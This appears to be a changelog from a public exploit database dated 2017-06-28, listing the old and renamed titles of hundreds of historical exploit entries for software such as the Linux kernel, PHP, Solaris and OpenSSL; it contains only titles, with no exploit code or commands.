DB: 2017-06-28

4 new exploits

OpenSSL ASN.1 < 0.9.6j / 0.9.7b - Brute Forcer for Parsing Bugs
OpenSSL ASN.1 < 0.9.6j/0.9.7b - Brute Forcer for Parsing Bugs

Solaris 2.7 / 2.8 Catman - Local Insecure tmp Symlink Exploit
Solaris 2.7/2.8 Catman - Local Insecure tmp Symlink Exploit

RedHat 6.1 / 6.2 - TTY Flood Users Exploit
RedHat 6.1/6.2 - TTY Flood Users Exploit

Linux Kernel 2.4.x / 2.6.x - Assembler Inline Function Local Denial of Service
Linux Kernel 2.4.x/2.6.x - Assembler Inline Function Local Denial of Service
Linux Kernel 2.4.28 / 2.6.9 - 'scm_send Local' Denial of Service
Linux Kernel 2.6.9 / 2.4.22-28 - 'igmp.c' Local Denial of Service
Linux Kernel 2.4.28/2.6.9 - 'scm_send Local' Denial of Service
Linux Kernel 2.4.22-28/2.6.9 - 'igmp.c' Local Denial of Service
Linux Kernel 2.4.28 / 2.6.9 - vc_resize int Local Overflow
Linux Kernel 2.4.28 / 2.6.9 - Memory Leak Local Denial of Service
Linux Kernel 2.4.28 / 2.6.9 - 'ip_options_get' Local Overflow
Linux Kernel 2.4.28/2.6.9 - vc_resize int Local Overflow
Linux Kernel 2.4.28/2.6.9 - Memory Leak Local Denial of Service
Linux Kernel 2.4.28/2.6.9 - 'ip_options_get' Local Overflow

Apple Mac OSX 10.3.7 - Input Validation Flaw parse_machfile() Denial of Service
Apple Mac OSX 10.3.7 - Input Validation Flaw 'parse_machfile()' Denial of Service

Xaraya 1.0.0 RC4 - create() Denial of Service
Xaraya 1.0.0 RC4 - 'create()' Denial of Service

BitchX 1.1-final - do_hook() Remote Denial of Service
BitchX 1.1-final - 'do_hook()' Remote Denial of Service

Quake 3 Engine Client - CG_ServerCommand() Remote Overflow
Quake 3 Engine Client - 'CG_ServerCommand()' Remote Overflow

Apache (mod_rewrite) < 1.3.37 / 2.0.59 / 2.2.3 - Remote Overflow (PoC)
Apache (mod_rewrite) < 1.3.37/2.0.59/2.2.3 - Remote Overflow (PoC)

FreeBSD 5.4 / 6.0 - (ptrace PT_LWPINFO) Local Denial of Service
FreeBSD 5.4/6.0 - (ptrace PT_LWPINFO) Local Denial of Service

Asterisk 1.0.12 / 1.2.12.1 - 'chan_skinny' Remote Heap Overflow (PoC)
Asterisk 1.0.12/1.2.12.1 - 'chan_skinny' Remote Heap Overflow (PoC)

PHP 4.4.4/5.1.6 - htmlentities() Local Buffer Overflow (PoC)
PHP 4.4.4/5.1.6 - 'htmlentities()' Local Buffer Overflow (PoC)

Microsoft Windows - NetrWkstaUserEnum() Remote Denial of Service
Microsoft Windows - 'NetrWkstaUserEnum()' Remote Denial of Service

Apple Mac OSX 10.4.8 - AppleTalk ATPsndrsp() Heap Buffer Overflow (PoC)
Apple Mac OSX 10.4.8 - AppleTalk 'ATPsndrsp()' Heap Buffer Overflow (PoC)

Apple Mac OSX 10.4.x Kernel - shared_region_map_file_np() Memory Corruption
Apple Mac OSX 10.4.x Kernel - 'shared_region_map_file_np()' Memory Corruption
PHP 4.4.4 - Unserialize() ZVAL Reference Counter Overflow (PoC)
Netrek 2.12.0 - pmessage2() Remote Limited Format String
PHP 5 - wddx_deserialize() String Append Crash
Asterisk 1.2.15 / 1.4.0 - Unauthenticated Remote Denial of Service
PHP 4.4.4 - 'Unserialize()' ZVAL Reference Counter Overflow (PoC)
Netrek 2.12.0 - 'pmessage2()' Remote Limited Format String
PHP 5 - 'wddx_deserialize()' String Append Crash
Asterisk 1.2.15/1.4.0 - Unauthenticated Remote Denial of Service
Asterisk 1.2.16 / 1.4.1 - SIP INVITE Remote Denial of Service
PHP 4.4.5 / 4.4.6 - session_decode() Double-Free (PoC)
Asterisk 1.2.16/1.4.1 - SIP INVITE Remote Denial of Service
PHP 4.4.5/4.4.6 - 'session_decode()' Double-Free (PoC)

Opera 9.10 - alert() Remote Denial of Service
Opera 9.10 - 'alert()' Remote Denial of Service
PHP 5.2.3 - bz2 com_print_typeinfo() Denial of Service
PHP 5.2.3 - glob() Denial of Service
Asterisk < 1.2.22 / 1.4.8 / 2.2.1 - chan_skinny Remote Denial of Service
PHP 5.2.3 - 'bz2 com_print_typeinfo()' Denial of Service
PHP 5.2.3 - 'glob()' Denial of Service
Asterisk < 1.2.22/1.4.8/2.2.1 - 'chan_skinny' Remote Denial of Service

Asterisk < 1.2.22 / 1.4.8 IAX2 channel driver - Remote Crash
Asterisk < 1.2.22/1.4.8 - IAX2 Channel Driver Remote Crash

HP ActiveX - 'hpqutil.dll' ListFiles Remote Heap Overflow (PoC)
HP - ActiveX 'hpqutil.dll' ListFiles Remote Heap Overflow (PoC)

EDraw Office Viewer Component 5.3 - FtpDownloadFile() Remote Buffer Overflow
EDraw Office Viewer Component 5.3 - 'FtpDownloadFile()' Remote Buffer Overflow

eXtremail 2.1.1 - memmove() Remote Denial of Service
eXtremail 2.1.1 - 'memmove()' Remote Denial of Service

Adobe Shockwave - ShockwaveVersion() Stack Overflow (PoC)
Adobe Shockwave - 'ShockwaveVersion()' Stack Overflow (PoC)

Apple Mac OSX 10.4.x Kernel - i386_set_ldt() Integer Overflow (PoC)
Apple Mac OSX 10.4.x Kernel - 'i386_set_ldt()' Integer Overflow (PoC)
OpenSSL < 0.9.7l / 0.9.8d - SSLv2 Client Crash
SkyFex Client 1.0 - ActiveX Start() Method Remote Stack Overflow
DivX Player 6.6.0 - ActiveX SetPassword() Denial of Service (PoC)
OpenSSL < 0.9.7l/0.9.8d - SSLv2 Client Crash
SkyFex Client 1.0 - ActiveX 'Start()' Method Remote Stack Overflow
DivX Player 6.6.0 - ActiveX 'SetPassword()' Denial of Service (PoC)

KingSoft - 'UpdateOcx2.dll' SetUninstallName() Heap Overflow (PoC)
KingSoft - 'UpdateOcx2.dll' 'SetUninstallName()' Heap Overflow (PoC)

Adobe Acrobat Reader 8.1.2 - Malformed PDF Remote Denial of Service (PoC)
Adobe Acrobat Reader 8.1.2 - Malformed '.PDF' Remote Denial of Service (PoC)

Postfix < 2.4.9 / 2.5.5 / 2.6-20080902 - '.forward' Local Denial of Service
Postfix < 2.4.9/2.5.5/2.6-20080902 - '.forward' Local Denial of Service

fhttpd 0.4.2 un64() - Remote Denial of Service
fhttpd 0.4.2 - 'un64()' Remote Denial of Service

VBA32 Personal AntiVirus 3.12.8.x - (malformed archive) Denial of Service
VBA32 Personal AntiVirus 3.12.8.x - Malformed Archive Denial of Service

AyeView 2.20 - Malformed .GIF Image Local Crash
AyeView 2.20 - Malformed '.GIF' Image Local Crash

Solaris 9 PortBind - XDR-DECODE taddr2uaddr() Remote Denial of Service
Solaris 9 PortBind - XDR-DECODE 'taddr2uaddr()' Remote Denial of Service

Linux Kernel < 2.4.36.9 / 2.6.27.5 - Unix Sockets Local Kernel Panic Exploit
Linux Kernel < 2.4.36.9/2.6.27.5 - Unix Sockets Local Kernel Panic Exploit

DesignWorks Professional 4.3.1 - Local '.CCT' File Stack Buffer Overflow (PoC)
DesignWorks Professional 4.3.1 - '.CCT' File Local Stack Buffer Overflow (PoC)

Vinagre < 2.24.2 - show_error() Remote Format String (PoC)
Vinagre < 2.24.2 - 'show_error()' Remote Format String (PoC)

Linux Kernel 2.6.27.7-generic / 2.6.18 / 2.6.24-1 - Local Denial of Service
Linux Kernel 2.6.27.7-generic/2.6.18/2.6.24-1 - Local Denial of Service

MW6 Barcode ActiveX - 'Barcode.dll' Remote Heap Overflow (PoC)
MW6 Barcode - ActiveX 'Barcode.dll' Remote Heap Overflow (PoC)

Multiple Vendors libc:fts_*() - Local Denial of Service
Multiple Vendors - 'libc:fts_*()' Local Denial of Service

Icewarp Merak Mail Server 9.4.1 - Base64FileEncode() Buffer Overflow (PoC)
Icewarp Merak Mail Server 9.4.1 - 'Base64FileEncode()' Buffer Overflow (PoC)

OpenSSL 0.9.8k / 1.0.0-beta2 - DTLS Remote Memory Exhaustion Denial of Service
OpenSSL 0.9.8k/1.0.0-beta2 - DTLS Remote Memory Exhaustion Denial of Service

Soulseek 157 NS x / 156.x - Remote Distributed Search Code Execution
Soulseek 157 NS x/156.x - Remote Distributed Search Code Execution

Notepad++ 5.4.5 - Local .C/CPP Stack Buffer Overflow (PoC)
Notepad++ 5.4.5 - '.C' / '.CPP' Local Stack Buffer Overflow (PoC)

Drupal 6.16 / 5.21 - Denial of Service
Drupal 5.21/6.16 - Denial of Service
SopCast SopCore Control ActiveX - Remote Execution (PoC)
UUSee ReliPlayer ActiveX - Remote Execution (PoC)
SopCast SopCore Control - ActiveX Remote Execution (PoC)
UUSee ReliPlayer - ActiveX Remote Execution (PoC)

Aqua Real 1.0 / 2.0 - Local Crash (PoC)
Aqua Real 1.0/2.0 - Local Crash (PoC)

iPhone - WebCore::CSSSelector() Remote Crash
iPhone - 'WebCore::CSSSelector()' Remote Crash

avtech software 'avc781viewer.dll' ActiveX - Multiple Vulnerabilities
Avtech Software - ActiveX 'avc781viewer.dll' Multiple Vulnerabilities

Apple Safari 4.0.3 / 4.0.4 - Stack Exhaustion
Apple Safari 4.0.3/4.0.4 - Stack Exhaustion
Multiple browsers - history.go() Denial of Service
Multiple browsers - window.print() Denial of Service
Multiple browsers - 'history.go()' Denial of Service
Multiple browsers - 'window.print()' Denial of Service

FreeBSD Kernel - mountnfs() Exploit
FreeBSD Kernel - 'mountnfs()' Exploit

Microsoft Internet Explorer 6 / 7 - Remote Denial of Service
Microsoft Internet Explorer 6/7 - Remote Denial of Service

PHP 5.3.3 - ibase_gen_id() Off-by-One Overflow
PHP 5.3.3 - 'ibase_gen_id()' Off-by-One Overflow
Microsoft DRM Technology 'msnetobj.dll' ActiveX - Multiple Vulnerabilities
RarCrack 0.2 - 'Filename' init() .bss (PoC)
Microsoft DRM Technology - 'msnetobj.dll' ActiveX Multiple Vulnerabilities
RarCrack 0.2 - 'Filename' 'init()' '.bss' (PoC)

Mozilla Firefox 3.5.10 / 3.6.6 - WMP Memory Corruption Using Popups
Mozilla Firefox 3.5.10/3.6.6 - WMP Memory Corruption Using Popups

Microsoft Windows Mobile 6.1 / 6.5 - Double-Free Denial of Service
Microsoft Windows Mobile 6.1/6.5 - Double-Free Denial of Service
LeadTools 11.5.0.9 (ltdlg11n.ocx) - GetColorRes() Access Violation Denial of Service
LeadTools 11.5.0.9 (lttmb11n.ocx) - BrowseDir() Access Violation Denial of Service
LeadTools 11.5.0.9 - 'ltdlg11n.ocx' GetColorRes() Access Violation Denial of Service
LeadTools 11.5.0.9 - 'lttmb11n.ocx' BrowseDir() Access Violation Denial of Service

VideoLAN VLC Media Player 1.1 - Subtitle StripTags() Function Memory Corruption
VideoLAN VLC Media Player 1.1 - Subtitle 'StripTags()' Function Memory Corruption

PHP 5.3.5 - grapheme_extract() Null Pointer Dereference
PHP 5.3.5 - 'grapheme_extract()' Null Pointer Dereference

Novell ZenWorks 10 / 11 - TFTPD Remote Code Execution
Novell ZenWorks 10/11 - TFTPD Remote Code Execution

PHP 5.3.6 - shmop_read() Integer Overflow Denial of Service
PHP 5.3.6 - 'shmop_read()' Integer Overflow Denial of Service
PHP 5.3.10 - spl_autoload_register() Local Denial of Service
PHP 5.3.10 - spl_autoload_call() Local Denial of Service
PHP 5.3.10 - 'spl_autoload_register()' Local Denial of Service
PHP 5.3.10 - 'spl_autoload_call()' Local Denial of Service

PHP 5.3.10 - spl_autoload() Local Denial of Service
PHP 5.3.10 - 'spl_autoload()' Local Denial of Service

Apple iOS 5.1.1 - Safari Browser - JS match() & search() Crash (PoC)
Apple iOS 5.1.1 Safari Browser - 'JS match()' / 'search()' Crash (PoC)

Linux Kernel 2.0 / 2.1 - Send a SIGIO Signal To Any Process
Linux Kernel 2.0/2.1 - Send a SIGIO Signal To Any Process

Linux Kernel 2.0 / 2.1 (Digital UNIX 4.0 D / FreeBSD 2.2.4 / HP HP-UX 10.20/11.0 / IBM AIX 3.2.5 / NetBSD 1.2 / Solaris 2.5.1) - Smurf Denial of Service
Linux Kernel 2.0/2.1 (Digital UNIX 4.0 D / FreeBSD 2.2.4 / HP HP-UX 10.20/11.0 / IBM AIX 3.2.5 / NetBSD 1.2 / Solaris 2.5.1) - Smurf Denial of Service
Linux Kernel 2.2 / 2.3 / Debian Linux 2.1 / RedHat Linux 6.0 / S.u.S.E. Linux 6.1 - IP Options
Linux Kernel 2.0 / 2.1 / 2.2 - autofs Exploit
Linux Kernel 2.2/2.3 (Debian Linux 2.1 / RedHat Linux 6.0 / S.u.S.E. Linux 6.1) - IP Options
Linux Kernel 2.0/2.1/2.2 - autofs Exploit

HP HP-UX 10.20 / IBM AIX 4.1.5 - connect() Denial of Service
HP HP-UX 10.20 / IBM AIX 4.1.5 - 'connect()' Denial of Service

Linux Kernel 2.0 / 2.0.33 - i_count Overflow (PoC)
Linux Kernel 2.0/2.0.33 - i_count Overflow (PoC)

FreeBSD 5.0 / NetBSD 1.4.2 / OpenBSD 2.7 - setsockopt() Denial of Service
FreeBSD 5.0 / NetBSD 1.4.2 / OpenBSD 2.7 - 'setsockopt()' Denial of Service

Linux Kernel 2.2.12 / 2.2.14 / 2.3.99 (RedHat 6.x) - Socket Denial of Service
Linux Kernel 2.2.12/2.2.14/2.3.99 (RedHat 6.x) - Socket Denial of Service

PHP 6.0 - openssl_verify() Local Buffer Overflow (PoC)
PHP 6.0 - 'openssl_verify()' Local Buffer Overflow (PoC)

Linux Kernel 2.1.89 / 2.2.x - Zero-Length Fragment
Linux Kernel 2.1.89/2.2.x - Zero-Length Fragment

Wireshark 1.8.2 / 1.6.0 - Buffer Overflow (PoC)
Wireshark 1.6.0/1.8.2 - Buffer Overflow (PoC)

MAILsweeper - SMTP 4.2.1 + F-Secure Anti-Virus 5.0.2 / 5.2.1 - File Scanner Malicious Archive Denial of Service
MAILsweeper - SMTP 4.2.1 + F-Secure Anti-Virus 5.0.2/5.2.1 - File Scanner Malicious Archive Denial of Service

Linux Kernel 2.2 / 2.4 - Deep Symbolic Link Denial of Service
Linux Kernel 2.2/2.4 - Deep Symbolic Link Denial of Service

Linux Kernel 2.4.18 / 2.4.19 - Privileged File Descriptor Resource Exhaustion
Linux Kernel 2.4.18/2.4.19 - Privileged File Descriptor Resource Exhaustion

Zlib 1.1.4 - Compression Library gzprintf() Buffer Overrun (1)
Zlib 1.1.4 - Compression Library 'gzprintf()' Buffer Overrun (1)

PHP 4.3 - socket_iovec_alloc() Integer Overflow
PHP 4.3 - 'socket_iovec_alloc()' Integer Overflow
PHP 4.x - socket_recv() Signed Integer Memory Corruption
PHP 4.x - socket_recvfrom() Signed Integer Memory Corruption
PHP 4.x - 'socket_recv()' Signed Integer Memory Corruption
PHP 4.x - 'socket_recvfrom()' Signed Integer Memory Corruption

Linux Kernel 2.4 / 2.6 - Sigqueue Blocking Denial of Service
Linux Kernel 2.4/2.6 - Sigqueue Blocking Denial of Service

Colloquy 1.3.5 / 1.3.6 - Denial of Service
Colloquy 1.3.5/1.3.6 - Denial of Service

FreeBSD 4.10/5.x - execve() Unaligned Memory Access Denial of Service
FreeBSD 4.10/5.x - 'execve()' Unaligned Memory Access Denial of Service

PHP 3/4/5 - Multiple Local / Remote Vulnerabilities (1)
PHP 3/4/5 - Local/Remote Multiple Vulnerabilities (1)

Linux Kernel 2.4.x / 2.6.x - Local Denial of Service / Memory Disclosure Vulnerabilities
Linux Kernel 2.4.x/2.6.x - Local Denial of Service / Memory Disclosure Vulnerabilities

PHP 3/4/5 - Multiple Local And Remote Vulnerabilities (2)
PHP 3/4/5 - Local/Remote Multiple Vulnerabilities (2)

Linux Kernel 2.6.32-642 / 3.16.0-4 - 'inode' Integer Overflow
Linux Kernel 2.6.32-642 /3.16.0-4 - 'inode' Integer Overflow

Linux Kernel 2.4.x / 2.6.x - Multiple Unspecified ISO9660 Filesystem Handling Vulnerabilities
Linux Kernel 2.4.x/2.6.x - Multiple Unspecified ISO9660 Filesystem Handling Vulnerabilities

Linux Kernel 2.4.x / 2.6.x - BlueTooth Signed Buffer Index (PoC)
Linux Kernel 2.4.x/2.6.x - BlueTooth Signed Buffer Index (PoC)

Linux Kernel 2.2.x / 2.3.x / 2.4.x / 2.5.x / 2.6.x - ELF Core Dump Local Buffer Overflow
Linux Kernel 2.2.x/2.3.x/2.4.x/2.5.x/2.6.x - ELF Core Dump Local Buffer Overflow

SIEMENS Solid Edge ST4/ST5 SEListCtrlX ActiveX - SetItemReadOnly Arbitrary Memory Rewrite Remote Code Execution
SIEMENS Solid Edge ST4/ST5 SEListCtrlX - ActiveX SetItemReadOnly Arbitrary Memory Rewrite Remote Code Execution

Apache CXF < 2.5.10 / 2.6.7 / 2.7.4 - Denial of Service
Apache CXF < 2.5.10/2.6.7/2.7.4 - Denial of Service

Firebird 1.5 - Local Inet_Server Buffer Overflow
Firebird 1.5 - Inet_Server Local Buffer Overflow

Apple Mac OSX 10.x - '.zip' Parsing BOMStackPop() Function Overflow
Apple Mac OSX 10.x - '.zip' Parsing 'BOMStackPop()' Function Overflow

FreeBSD 5.x I386_Set_LDT() - Multiple Local Denial of Service Vulnerabilities
FreeBSD 5.x - 'I386_Set_LDT()' Multiple Local Denial of Service Vulnerabilities

FortKnox Personal Firewall 9.0.305.0 / 10.0.305.0 - Kernel Driver 'fortknoxfw.sys' Memory Corruption
FortKnox Personal Firewall 9.0.305.0/10.0.305.0 - Kernel Driver 'fortknoxfw.sys' Memory Corruption

PulseAudio 0.9.5 - Assert() Remote Denial of Service
PulseAudio 0.9.5 - 'Assert()' Remote Denial of Service

VBScript 5.8.7600.16385 / 5.8.9600.16384 - RegExpComp::PnodeParse Out-of-Bounds Read
VBScript 5.8.7600.16385/5.8.9600.16384 - RegExpComp::PnodeParse Out-of-Bounds Read

PHP openssl_x509_parse() - Memory Corruption
PHP - 'openssl_x509_parse()' Memory Corruption
MW6 Technologies Aztec ActiveX - (Data parameter) Buffer Overflow
MW6 Technologies Datamatrix ActiveX - (Data Parameter) - Buffer Overflow
MW6 Technologies MaxiCode ActiveX - (Data parameter) Buffer Overflow
MW6 Technologies Aztec - ActiveX 'Data Pparameter Buffer Overflow
MW6 Technologies Datamatrix - ActiveX 'Data' Parameter Buffer Overflow
MW6 Technologies MaxiCode - ActiveX 'Data' Parameter Buffer Overflow

MySQL 6.0.9 - GeomFromWKB() Function First Argument Geometry Value Handling Denial of Service
MySQL 6.0.9 - 'GeomFromWKB()' Function First Argument Geometry Value Handling Denial of Service

PHP 5.3.x  'Intl' Extension - 'NumberFormatter::setSymbol()' Function Denial of Service
PHP 5.3.x 'Intl' Extension - 'NumberFormatter::setSymbol()' Function Denial of Service

phpMyAdmin 4.0.x / 4.1.x / 4.2.x - Denial of Service
phpMyAdmin 4.0.x/4.1.x/4.2.x - Denial of Service

UltraPlayer 2.112 Malformed - '.avi' File Denial of Service
UltraPlayer 2.112 - Malformed '.avi' File Denial of Service

Linux Kernel 3.13 / 3.14 (Ubuntu) - 'splice()' System Call Local Denial of Service
Linux Kernel 3.13/3.14 (Ubuntu) - 'splice()' System Call Local Denial of Service
Advantech Webaccess 8.0 / 3.4.3 ActiveX - Multiple Vulnerabilities
PHP 5.4/5.5/5.6 - SplDoublyLinkedList Unserialize() Use-After-Free
PHP GMP unserialize() - Use-After-Free
PHP 5.4/5.5/5.6 - SplObjectStorage Unserialize() Use-After-Free
Advantech Webaccess 8.0 / 3.4.3 - ActiveX Multiple Vulnerabilities
PHP 5.4/5.5/5.6 - SplDoublyLinkedList 'Unserialize()' Use-After-Free
PHP GMP - 'unserialize()' Use-After-Free
PHP 5.4/5.5/5.6 - SplObjectStorage 'Unserialize()' Use-After-Free

PHP 5.4/5.5/5.6 - Unserialize() Use-After-Free Vulnerabilities
PHP 5.4/5.5/5.6 - 'Unserialize()' Use-After-Free Vulnerabilities
Python 2.7 strop.replace() Method - Integer Overflow
Python 3.3 < 3.5 product_setstate() Function - Out-of-Bounds Read
Python 2.7 - 'strop.replace()' Method Integer Overflow
Python 3.3 < 3.5 - 'product_setstate()' Function Out-of-Bounds Read

Linux Kernel 3.x / 4.x - prima WLAN Driver Heap Overflow
Linux Kernel 3.x/4.x - prima WLAN Driver Heap Overflow

NTPd ntp-4.2.6p5 - ctl_putdata() Buffer Overflow
NTPd ntp-4.2.6p5 - 'ctl_putdata()' Buffer Overflow

Linux Kernel 3.10 / 3.18 / 4.4 - Netfilter IPT_SO_SET_REPLACE Memory Corruption
Linux Kernel 3.10/3.18 /4.4 - Netfilter IPT_SO_SET_REPLACE Memory Corruption

ImageMagick 6.9.3-9 / 7.0.1-0 - Multiple Vulnerabilities (ImageTragick)
ImageMagick 6.9.3-9/7.0.1-0 - Multiple Vulnerabilities (ImageTragick)

Linux ARM/ARM64 - perf_event_open() Arbitrary Memory Read
Linux ARM/ARM64 - 'perf_event_open()' Arbitrary Memory Read

PHP 7.0.8 / 5.6.23 / 5.5.37 - bzread() Out-of-Bounds Write
PHP 5.5.37/5.6.23/7.0.8 - 'bzread()' Out-of-Bounds Write
Wireshark 2.0.0 < 2.0.4 / 1.12.0 < 1.12.12 - PacketBB Dissector Denial of Service
Wireshark 2.0.0 < 2.0.4 / 1.12.0 < 1.12.12 - WSP Dissector Denial of Service
Wireshark 2.0.0 < 2.0.4 / 1.12.0 < 1.12.12 - RLC Dissector Denial of Service
Wireshark 1.12.0 < 1.12.12 / 2.0.0 < 2.0.4- PacketBB Dissector Denial of Service
Wireshark 1.12.0 < 1.12.12 / 2.0.0 < 2.0.4 - WSP Dissector Denial of Service
Wireshark 1.12.0 < 1.12.12 / 2.0.0 < 2.0.4 - RLC Dissector Denial of Service

PHP 5.0.0 - hw_docbyanchor() Local Denial of Service
PHP 5.0.0 - 'hw_docbyanchor()' Local Denial of Service

Linux Kernel 4.8.0-22 / 3.10.0-327 (Ubuntu 16.10 / RedHat) - 'keyctl' Null Pointer Dereference
Linux Kernel 3.10.0-327/4.8.0-22 (Ubuntu 16.10 / RedHat) - 'keyctl' Null Pointer Dereference
IBM DB2 9.7 / 10.1 / 10.5 / 11.1 - Command Line Processor Buffer Overflow
Linux Kernel 2.2.x / 2.4.x (RedHat) - 'ptrace/kmod' Privilege Escalation
IBM DB2 9.7/10.1/10.5/11.1 - Command Line Processor Buffer Overflow
Microsoft MsMpEng - mpengine x86 Emulator Heap Corruption in VFS API
Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Privilege Escalation

man-db 2.4.1 - open_cat_stream() Local uid=man Exploit
man-db 2.4.1 - 'open_cat_stream()' Local uid=man Exploit
Linux Kernel 2.4.23 / 2.6.0 - 'do_mremap()' Bound Checking Validator (PoC) (1)
Linux Kernel 2.4.23 / 2.6.0 - 'do_mremap()' Bound Checking Validator (PoC) (2)
Linux Kernel 2.4.23/2.6.0 - 'do_mremap()' Bound Checking Validator (PoC) (1)
Linux Kernel 2.4.23/2.6.0 - 'do_mremap()' Bound Checking Validator (PoC) (2)

Linux Kernel 2.4.23 / 2.6.0 - 'do_mremap()' Bound Checking Privilege Escalation
Linux Kernel 2.4.23/2.6.0 - 'do_mremap()' Bound Checking Privilege Escalation
Linux Kernel 2.2.25 / 2.4.24 / 2.6.2 - 'mremap()' Validator (PoC)
Linux Kernel 2.2.25 / 2.4.24 / 2.6.2 - 'mremap()' Privilege Escalation
Linux Kernel 2.2.25/2.4.24/2.6.2 - 'mremap()' Validator (PoC)
Linux Kernel 2.2.25/2.4.24/2.6.2 - 'mremap()' Privilege Escalation

xsplumber - strcpy() Buffer Overflow
xsplumber - 'strcpy()' Buffer Overflow

BSDi 3.0 / 4.0 - rcvtty[mh] Local Exploit
BSDi 3.0/4.0 - rcvtty[mh] Local Exploit

Solaris 2.5 / 2.5.1 - getgrnam() Local Overflow
Solaris 2.5/2.5.1 - 'getgrnam()' Local Overflow

Solaris 7 / 8-beta - arp Local Overflow
Solaris 7/8-beta - ARP Local Overflow

Solaris 2.6 / 2.7 - '/usr/bin/write' Local Overflow
Solaris 2.6/2.7 - '/usr/bin/write' Local Overflow

LibXt - XtAppInitialize() Overflow *xterm Exploit
LibXt - 'XtAppInitialize()' Overflow *xterm Exploit

SGI IRIX - '/bin/login Local' Buffer Overflow
SGI IRIX - '/bin/login' Local Buffer Overflow

LibPNG 1.2.5 - png_jmpbuf() Local Buffer Overflow
LibPNG 1.2.5 - 'png_jmpbuf()' Local Buffer Overflow

CDRecord's ReadCD - '$RSH' exec() SUID Shell Creation
CDRecord's ReadCD - '$RSH' 'exec()' SUID Shell Creation

Linux Kernel 2.4.27 / 2.6.8 - 'binfmt_elf' Executable File Read Exploit
Linux Kernel 2.4.27/2.6.8 - 'binfmt_elf' Executable File Read Exploit

Linux Kernel 2.6.x < 2.6.7-rc3 (Slackware 9.1 / Debian 3.0) - 'sys_chown()' Group Ownership Alteration Privilege Escalation
Linux Kernel < 2.6.7-rc3 (Slackware 9.1 / Debian 3.0) - 'sys_chown()' Group Ownership Alteration Privilege Escalation

Setuid perl - PerlIO_Debug() Overflow
Setuid perl - 'PerlIO_Debug()' Overflow

Linux Kernel 2.4.x / 2.6.x - 'uselib()' Privilege Escalation (3)
Linux Kernel 2.4.x/2.6.x - 'uselib()' Privilege Escalation (3)

Linux Kernel 2.4.x / 2.6.x - 'Bluez' BlueTooth Signed Buffer Index Privilege Escalation (2)
Linux Kernel 2.4.x/2.6.x - 'Bluez' BlueTooth Signed Buffer Index Privilege Escalation (2)

ePSXe 1.6.0 - nogui() Local Exploit
ePSXe 1.6.0 - 'nogui()' Local Exploit
Solaris 9 / 10 - ld.so Privilege Escalation (1)
Solaris 9 / 10 - ld.so Privilege Escalation (2)
Solaris 9/10 - 'ld.so' Privilege Escalation (1)
Solaris 9/10 - 'ld.so' Privilege Escalation (2)

Python 2.4.2 - realpath() Local Stack Overflow
Python 2.4.2 - 'realpath()' Local Stack Overflow

Solaris 10 sysinfo() - Local Kernel Memory Disclosure (1)
Solaris 10 - 'sysinfo()' Local Kernel Memory Disclosure (1)

Open Cubic Player 2.6.0pre6 / 0.1.10_rc5 - Multiple Buffer Overflow
Open Cubic Player 2.6.0pre6/0.1.10_rc5 - Multiple Buffer Overflow
PHP 4.4.3 / 5.1.4 - (objIndex) Local Buffer Overflow (PoC)
PHP 4.4.3 / 5.1.4 - (sscanf) Local Buffer Overflow
PHP 4.4.3/5.1.4 - 'objIndex' Local Buffer Overflow (PoC)
PHP 4.4.3/5.1.4 - 'sscanf' Local Buffer Overflow

Solaris 8 / 9 - '/usr/ucb/ps' Local Information Leak Exploit
Solaris 8/9 - '/usr/ucb/ps' Local Information Leak Exploit

OpenBSD 3.x < 4.0 - vga_ioctl() Privilege Escalation
OpenBSD 3.x < 4.0 - 'vga_ioctl()' Privilege Escalation
PHP < 4.4.5 / 5.2.1 - PHP_binary Session Deserialization Information Leak
PHP < 4.4.5 / 5.2.1 - WDDX Session Deserialization Information Leak
PHP 4.4.6 - mssql_[p]connect() Local Buffer Overflow
PHP 5.2.1 - substr_compare() Information Leak Exploit
PHP < 4.4.5 / 5.2.1 - (shmop functions) Local Code Execution
PHP < 4.4.5 / 5.2.1 - (shmop) SSL RSA Private-Key Disclosure
PHP < 4.4.5/5.2.1 - PHP_binary Session Deserialization Information Leak
PHP < 4.4.5/5.2.1 - WDDX Session Deserialization Information Leak
PHP 4.4.6 - 'mssql_[p]connect()' Local Buffer Overflow
PHP 5.2.1 - 'substr_compare()' Information Leak Exploit
PHP < 4.4.5/5.2.1 - 'shmop' Functions Local Code Execution
PHP < 4.4.5/5.2.1 - 'shmop' SSL RSA Private-Key Disclosure
PHP 4.4.6 - crack_opendict() Local Buffer Overflow (PoC)
PHP 4.4.6 - snmpget() object id Local Buffer Overflow (PoC)
PHP 4.4.6 - 'crack_opendict()' Local Buffer Overflow (PoC)
PHP 4.4.6 - 'snmpget()' Object id Local Buffer Overflow (PoC)

PHP 4.4.6 - cpdf_open() Local Source Code Disclosure (PoC)
PHP 4.4.6 - 'cpdf_open()' Local Source Code Disclosure (PoC)

PHP 5.2.1 - session_regenerate_id() Double-Free Exploit
PHP 5.2.1 - 'session_regenerate_id()' Double-Free Exploit
PHP 4.4.6 - ibase_connect() Local Buffer Overflow
PHP 4.4.6 / 5.2.1 - array_user_key_compare() ZVAL dtor Local Exploit
PHP 5.2.0 (OSX) - header() Space Trimming Buffer Underflow Exploit
PHP 4.4.6 / 5.2.1 - ext/gd Already Freed Resources Usage Exploit
PHP 5.2.1 - hash_update_file() Freed Resource Usage Exploit
PHP 5.2.1 - Unserialize() Local Information Leak Exploit
PHP < 4.4.5 / 5.2.1 - _SESSION unset() Local Exploit
PHP < 4.4.5 / 5.2.1 - _SESSION Deserialization Overwrite
PHP 4.4.6 - 'ibase_connect()' Local Buffer Overflow
PHP 4.4.6/5.2.1 - 'array_user_key_compare()' ZVAL dtor Local Exploit
PHP 5.2.0 (OSX) - 'header()' Space Trimming Buffer Underflow Exploit
PHP 4.4.6/5.2.1 - ext/gd Already Freed Resources Usage Exploit
PHP 5.2.1 - 'hash_update_file()' Freed Resource Usage Exploit
PHP 5.2.1 - 'Unserialize()' Local Information Leak Exploit
PHP < 4.4.5/5.2.1 - '_SESSION' 'unset()' Local Exploit
PHP < 4.4.5/5.2.1 - '_SESSION' Deserialization Overwrite

PHP 5.2.3 - snmpget() object id Local Buffer Overflow
PHP 5.2.3 - 'snmpget()' Object id Local Buffer Overflow

IBM AIX 5.3 SP6 - FTP gets() Privilege Escalation
IBM AIX 5.3 SP6 - FTP 'gets()' Privilege Escalation

PHP 5.2.3 - snmpget() object id Local Buffer Overflow (EDI)
PHP 5.2.3 - 'snmpget()' object id Local Buffer Overflow (EDI)

PHP 'FFI' Extension 5.0.5 - 'Safe_mode' Local  Bypass Exploit
